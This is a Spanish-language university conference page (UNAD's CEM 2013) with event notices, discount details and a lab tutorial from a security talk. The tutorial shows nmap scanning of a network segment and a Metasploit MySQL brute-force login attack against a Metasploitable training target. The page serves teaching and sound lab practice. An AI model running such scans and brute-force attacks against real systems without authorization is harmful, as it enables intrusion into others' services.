Presentación Certificados Contáctenos Memorias CEM 2013
Share via e-mail Print

FINALIZA EL PRIMER CICLO DE CONFERENCIAS POS-CEM 2013

UNIVERSIDAD NACIONAL ABIERTA Y A DISTANCIA

ESCUELA DE CIENCIAS BÁSICAS, TECNOLOGÍA E INGENIERÍA


La Escuela de Ciencias Básicas, Tecnología e Ingeniería de la UNAD agradece a todos los participantes de las diferentes áreas, la acogida a éste evento, así como a los organizadores y demás personas que de algún modo contribuyeron al exito del mismo.


Proximamente se proyectarán los demás Ciclos de Conferencias, que al igual, contarán con Expositores Nacionales e Internacionales.



Memoria Conferencia No. 1


Hackers y tecnología, una peligrosa realidad para la privacidad de nuestros datos.


Ponente: John Freddy Quintero Tamayo

Ingeniero de Sistemas y especialista en seguridad informática, con vasta experiencia como investigador en seguridad informática, durante su vida ha sido invitado a dictar charlas en diferentes eventos.

El CEM 2013 ha logrado aplicar para el proceso de inscripción al encuentro el descuento por nómina para los funcionarios de la UNAD en un único pago por descuento de la nómina en el mes de mayo de 2013.


Para  acceder a este beneficio el funcionario docente o administrativo debe enviar la carta de autorización escaneada con su firma legible al correo electrónico oficial del CEM: encuentroingenierias@unad.edu.co


Las tarifas de inscripción al encuentro se mantienen vigentes para todas las fechas;  de esta manera las personas que envíen su carta de autorización al correo hasta el día 19 de abril de 2013 deben solicitar un descuento de $224.000 para el pago de su inscripción. Y las personas que envíen sus cartas de descuento entre el 20 de abril y el 03 de mayo de 2013 pagarán por descuento de nómina $252.000.


Este proceso se desarrollará desde el 14 de abril de 2013 y hasta el día 09 de mayo de 2013, fecha límite para acceder a este beneficio, y fecha desde la cual, aplica el sistema de inscripciones en línea para todos los funcionarios de la UNAD hasta el cierre de las mismas.


Haga clic aquí para descargar el formato de autorización de pago por descuento en formato WORD



Atentamente,

COMITÉ ORGANIZADOR CEM -2013





El CEM 2013 establece alianza con Avianca como su línea aérea oficial, obtén un 15% de descuento en tarifa económica y un 20% de descuento en tarifa Ejecutiva en tiquetes aéreos con destino Cali durante la semana del encuentro.  


Para poder hacer efectivo el descuento solo debes presentar el código de descuento adjunto en el  E_card  (Ver/Descargar E_card PDF Aquí) y el recibo de pago por concepto de inscripción al CEM 2013 al momento de realizar la compra de los tiquetes. Próximamente se publicará  proceso de descuento para compra de tiquetes por Internet.




Nota: El Descuento aplica únicamente para la tarifa base del tiquete, aplican Condiciones y restricciones.



Atentamente,

COMITÉ ORGANIZADOR CEM -2013





Finaliza el Primer Ciclo de Conferencias Pos-CEM 2013 con una buena participación de Estudiantes, Egresados y Externos.

Certificación online para participantes al Primer Ciclo de Conferencias Pos-CEM 2013 a partir del Martes 23 de Julio a las 5:00pm en ésta página, Menú → Certificados.

Descargue aquí la presentación de las Memorias del Encuentro Nacional de Ingenierías 2012

Descargar

Material adicional: Demos paso a paso.

Ponente: Leonardo Huertas Calle
















Los siguientes demos fueron realizados en Backtrack 5 R3 (este sistema operativo se puede descargar de http://www.backtrack-linux.org/downloads/ )


Exiftool


DEMO 01: Para extraer metadatos de la imagen Cateyes.jpg (este archivo se adjunta al presente tutorial)


Comando: exiftool imagen.jpg

Ejemplo: exiftool Cateyes.jpg



DEMO 02 Para extraer la imagen completa desde el "recorte" o imagen Cateyes.jpg


Comando: exiftool -b -ThumbnailImage imagen.jpg > nombre_nuevo.jpg

Ejemplo: exiftool -b -ThumbnailImage Cateyes.jpg > periodista.jpg



Comandos básicos para Metasploitable el analisis desde BT5 R3



Para ver la dirección IP asignada en al BT5 R3


ifconfig


Una vez se averigua la IP asignada, se procede a hacer un scan del mismo segmento para descubrir posibles máquinas objetivo


nmap 192.168.29.*


Una vez se descubre la posible IP objetivo, se procede a averiguar los servicios instalados y su correspondiente version


nmap -sV IP_target


NOTA: Una vez se averigua la versión de cada uno de los servicios, el siguiente paso es averiguar en internet las diferentes vulnerabilidades para cada uno de ellos con el fin de ejecutar un exploit o para vulnerarlos con una suite de manera mas automática, ejemplo: Metasploit, Ermitage, etc



**** INGRESAR A METASPLOIT - Ejemplo de ataque de fuerza bruta ***


En BT5 R3 se ejecuta:


Para ingresar a la carpeta de Metaspolit y ejecutarlo


cd /pentest/exploits/framework2


Ejecutar Metasploit (hay que esperar unos momentos hasta que se pueda ver el ingreso a la aplicacion)


msfconsole   


Buscar una vulnerabilidad de MySQL (es tan solo un ejemplo de los tantos que se pueden lograr con este entorno de entrenamiento, se recomienda al lector practicar con otros ejemplos)


 search mysql_login


Para usar uno de los exploits


use auxiliary/scanner/mysql/mysql_login


Para mostrar parámetros a configurar

 

show options


Para "apuntar" el ataque a la IP objetivo


set RHOST IP_del_target


Para enviar varios hilos de "consulta"


set THREADS 1000


Para correr el exploit que en este momento ya esta cargado y configurado


run



>>> GRACIAS POR LA PARTICIPACIÓN <<<

Memoria Conferencia No. 2

Ataques cibernéticos contra sistemas vulnerables y contra el mismo ser humano.


Ponente: Leonardo Huertas Calle

Actualmente se desempeña como Asesor de Ciberseguridad y Ciberdefensa en el Ministerio de Defensa Nacional de Colombia. Implementó y fue Coordinador el Grupo de Respuesta a Emergencias Cibernéticas de Colombia – colCERT, fue el responsable de asesorar técnicamente la "Política Nacional de Ciberseguridad y Ciberdefensa - CONPES 3701".

Presentación Certificados Contáctenos Memorias CEM 2013